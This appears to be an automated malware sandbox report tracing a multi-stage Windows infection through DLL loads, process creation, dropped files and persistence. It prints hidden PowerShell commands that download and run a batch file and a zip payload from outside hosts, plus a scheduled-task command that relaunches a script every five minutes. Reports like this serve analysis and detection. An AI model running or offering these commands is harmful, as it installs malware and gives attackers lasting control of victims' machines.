Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exeSection loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dll
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: version.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: winmm.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: mpr.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wininet.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: userenv.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $url='https://candwfarmsllc.com/c2.bat'; $output=$env:TEMP + '\c2.bat'; Invoke-WebRequest -Uri $url -OutFile $output; Start-Process -FilePath $output -NoNewWindow"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exeCode function: 16_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,16_2_004062FC
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00250315 push cs; retn 0024h36_2_00250318
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_00220DE6 push ecx; ret 36_2_00220DF9
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EF0DE6 push ecx; ret 38_2_00EF0DF9

Persistence and Installation Behavior

barindex
Drops PE files with a suspicious file extension
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\msword\msword.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comFile created: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.comJump to dropped file

Boot Survival

barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_002926DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,36_2_002926DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 36_2_0021FC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,36_2_0021FC7C
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00F626DD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,38_2_00F626DD
Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.comCode function: 38_2_00EEFC7C GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,38_2_00EEFC7C
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
